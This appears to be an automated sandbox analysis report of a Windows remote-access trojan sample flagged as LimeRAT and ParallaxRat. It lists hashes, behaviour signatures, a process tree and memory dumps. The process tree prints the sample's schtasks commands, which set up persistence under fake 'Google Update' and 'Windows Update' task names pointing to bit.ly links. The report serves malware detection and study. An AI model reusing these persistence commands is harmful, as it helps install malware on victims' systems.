Analysis

  • max time kernel
    147s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    03-11-2021 08:37

General

  • Target

    2e45c3146bebd87ccef96e054374ea11.exe

  • Size

    645KB

  • MD5

    2e45c3146bebd87ccef96e054374ea11

  • SHA1

    f2be6622242c311beb54f984c2fd85b865c2431c

  • SHA256

    df6fa5b55c8196df0a53575cd26f5a7e53146899d41ab1a1a3acdb320f185d1f

  • SHA512

    4277153eaea844fdcd1ab7920d290f7a877a2a46e6d71b5b962f445395e7c0299e859409fb52e96920bc31ab6d7ed2be81e69021c0145585984dc57c76469b51

Malware Config

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • ParallaxRat

    ParallaxRat is a multipurpose RAT written in MASM.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e45c3146bebd87ccef96e054374ea11.exe
    "C:\Users\Admin\AppData\Local\Temp\2e45c3146bebd87ccef96e054374ea11.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:660
    • C:\Windows\system32\cmd.exe
      cmd /C schtasks /create /f /st "05:40" /sc daily /mo "30" /tn "GoogleUpdateTaskMachineCore{WFPWAHVH}" /tr "'explorer'http://bit.ly/2T86z58"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:968
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /st "05:40" /sc daily /mo "30" /tn "GoogleUpdateTaskMachineCore{WFPWAHVH}" /tr "'explorer'http://bit.ly/2T86z58"
        3⤵
        • Creates scheduled task(s)
        PID:1968
    • C:\Windows\system32\cmd.exe
      cmd /C schtasks /create /f /st "22:28" /sc monthly /m "mar" /tn "Windows Update" /tr "'explorer'http://bit.ly/2va2VQa"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:972
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /st "22:28" /sc monthly /m "mar" /tn "Windows Update" /tr "'explorer'http://bit.ly/2va2VQa"
        3⤵
        • Creates scheduled task(s)
        PID:1972
    • C:\Users\Admin\AppData\Roaming\security\wowreg32.exe
      "C:\Users\Admin\AppData\Roaming\security\wowreg32.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:560
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /st "05:05" /sc daily /mo "2" /tn "" /tr "'explorer'C_Settings.URL1"
        3⤵
        • Creates scheduled task(s)
        PID:1964
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /st "05:05" /sc daily /mo "1" /tn "" /tr "'explorer'C_Settings.URL2"
        3⤵
        • Creates scheduled task(s)
        PID:968
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 560 -s 628
        3⤵
        • Program crash
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        PID:972

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/560-98-0x000000001B431000-0x000000001B435000-memory.dmp

    Filesize

    16KB

  • memory/560-111-0x000000001B410000-0x000000001B412000-memory.dmp

    Filesize

    8KB

  • memory/560-99-0x000000001B41A000-0x000000001B41C000-memory.dmp

    Filesize

    8KB

  • memory/560-65-0x0000000000D30000-0x0000000000D31000-memory.dmp

    Filesize

    4KB

  • memory/560-119-0x000000001B415000-0x000000001B417000-memory.dmp

    Filesize

    8KB

  • memory/560-120-0x000000001B41D000-0x000000001B420000-memory.dmp

    Filesize

    12KB

  • memory/560-71-0x000000001B405000-0x000000001B406000-memory.dmp

    Filesize

    4KB

  • memory/560-70-0x000000001B3E6000-0x000000001B405000-memory.dmp

    Filesize

    124KB

  • memory/560-72-0x000000001B406000-0x000000001B407000-memory.dmp

    Filesize

    4KB

  • memory/560-74-0x000000001B408000-0x000000001B409000-memory.dmp

    Filesize

    4KB

  • memory/560-73-0x000000001B407000-0x000000001B408000-memory.dmp

    Filesize

    4KB

  • memory/560-76-0x000000001B40A000-0x000000001B40B000-memory.dmp

    Filesize

    4KB

  • memory/560-75-0x000000001B409000-0x000000001B40A000-memory.dmp

    Filesize

    4KB

  • memory/560-78-0x000000001B40C000-0x000000001B40D000-memory.dmp

    Filesize

    4KB

  • memory/560-100-0x000000001B435000-0x000000001B436000-memory.dmp

    Filesize

    4KB

  • memory/560-79-0x000000001B40D000-0x000000001B40E000-memory.dmp

    Filesize

    4KB

  • memory/560-81-0x000000001B40F000-0x000000001B410000-memory.dmp

    Filesize

    4KB

  • memory/560-80-0x000000001B40E000-0x000000001B40F000-memory.dmp

    Filesize

    4KB

  • memory/560-83-0x000000001B411000-0x000000001B412000-memory.dmp

    Filesize

    4KB

  • memory/560-82-0x000000001B410000-0x000000001B411000-memory.dmp

    Filesize

    4KB

  • memory/560-84-0x000000001B412000-0x000000001B413000-memory.dmp

    Filesize

    4KB

  • memory/560-85-0x000000001B413000-0x000000001B414000-memory.dmp

    Filesize

    4KB

  • memory/560-87-0x000000001B415000-0x000000001B417000-memory.dmp

    Filesize

    8KB

  • memory/560-86-0x000000001B414000-0x000000001B415000-memory.dmp

    Filesize

    4KB

  • memory/560-88-0x000000001B417000-0x000000001B419000-memory.dmp

    Filesize

    8KB

  • memory/560-90-0x000000001B41B000-0x000000001B41D000-memory.dmp

    Filesize

    8KB

  • memory/560-89-0x000000001B419000-0x000000001B41B000-memory.dmp

    Filesize

    8KB

  • memory/560-92-0x000000001B41F000-0x000000001B421000-memory.dmp

    Filesize

    8KB

  • memory/560-91-0x000000001B41D000-0x000000001B41F000-memory.dmp

    Filesize

    8KB

  • memory/560-94-0x000000001B423000-0x000000001B425000-memory.dmp

    Filesize

    8KB

  • memory/560-93-0x000000001B421000-0x000000001B423000-memory.dmp

    Filesize

    8KB

  • memory/560-96-0x000000001B429000-0x000000001B42D000-memory.dmp

    Filesize

    16KB

  • memory/560-95-0x000000001B425000-0x000000001B429000-memory.dmp

    Filesize

    16KB

  • memory/560-67-0x000000001B3E0000-0x000000001B3E2000-memory.dmp

    Filesize

    8KB

  • memory/560-97-0x000000001B42D000-0x000000001B431000-memory.dmp

    Filesize

    16KB

  • memory/560-77-0x000000001B40B000-0x000000001B40C000-memory.dmp

    Filesize

    4KB

  • memory/560-121-0x000000001B407000-0x000000001B40C000-memory.dmp

    Filesize

    20KB

  • memory/560-122-0x000000001B436000-0x000000001B437000-memory.dmp

    Filesize

    4KB

  • memory/560-103-0x000000001B416000-0x000000001B417000-memory.dmp

    Filesize

    4KB

  • memory/560-102-0x000000001B415000-0x000000001B41C000-memory.dmp

    Filesize

    28KB

  • memory/560-105-0x000000001B419000-0x000000001B41C000-memory.dmp

    Filesize

    12KB

  • memory/560-104-0x000000001B41D000-0x000000001B420000-memory.dmp

    Filesize

    12KB

  • memory/560-107-0x000000001B405000-0x000000001B406000-memory.dmp

    Filesize

    4KB

  • memory/560-106-0x000000001B407000-0x000000001B40C000-memory.dmp

    Filesize

    20KB

  • memory/560-108-0x000000001B40E000-0x000000001B411000-memory.dmp

    Filesize

    12KB

  • memory/560-110-0x000000001B416000-0x000000001B417000-memory.dmp

    Filesize

    4KB

  • memory/560-109-0x000000001B40E000-0x000000001B412000-memory.dmp

    Filesize

    16KB

  • memory/560-112-0x000000001B410000-0x000000001B412000-memory.dmp

    Filesize

    8KB

  • memory/560-101-0x000000001B41D000-0x000000001B420000-memory.dmp

    Filesize

    12KB

  • memory/560-114-0x000000001B419000-0x000000001B41C000-memory.dmp

    Filesize

    12KB

  • memory/560-113-0x000000001B41D000-0x000000001B41E000-memory.dmp

    Filesize

    4KB

  • memory/560-116-0x000000001B436000-0x000000001B438000-memory.dmp

    Filesize

    8KB

  • memory/560-115-0x000000001B407000-0x000000001B40B000-memory.dmp

    Filesize

    16KB

  • memory/560-118-0x000000001B43A000-0x000000001B43C000-memory.dmp

    Filesize

    8KB

  • memory/560-117-0x000000001B438000-0x000000001B43A000-memory.dmp

    Filesize

    8KB

  • memory/560-131-0x000000001D8A9000-0x000000001D8B1000-memory.dmp

    Filesize

    32KB

  • memory/560-130-0x000000001D8A0000-0x000000001D8A9000-memory.dmp

    Filesize

    36KB

  • memory/560-129-0x000000001B454000-0x000000001B460000-memory.dmp

    Filesize

    48KB

  • memory/560-128-0x000000001B450000-0x000000001B454000-memory.dmp

    Filesize

    16KB

  • memory/560-127-0x000000001B44C000-0x000000001B450000-memory.dmp

    Filesize

    16KB

  • memory/560-126-0x000000001B448000-0x000000001B44C000-memory.dmp

    Filesize

    16KB

  • memory/560-125-0x000000001B444000-0x000000001B448000-memory.dmp

    Filesize

    16KB

  • memory/560-124-0x000000001B440000-0x000000001B444000-memory.dmp

    Filesize

    16KB

  • memory/560-123-0x000000001B43C000-0x000000001B440000-memory.dmp

    Filesize

    16KB

  • memory/660-55-0x0000000000210000-0x0000000000211000-memory.dmp

    Filesize

    4KB

  • memory/660-57-0x000000001AFF0000-0x000000001AFF2000-memory.dmp

    Filesize

    8KB

  • memory/972-163-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp

    Filesize

    8KB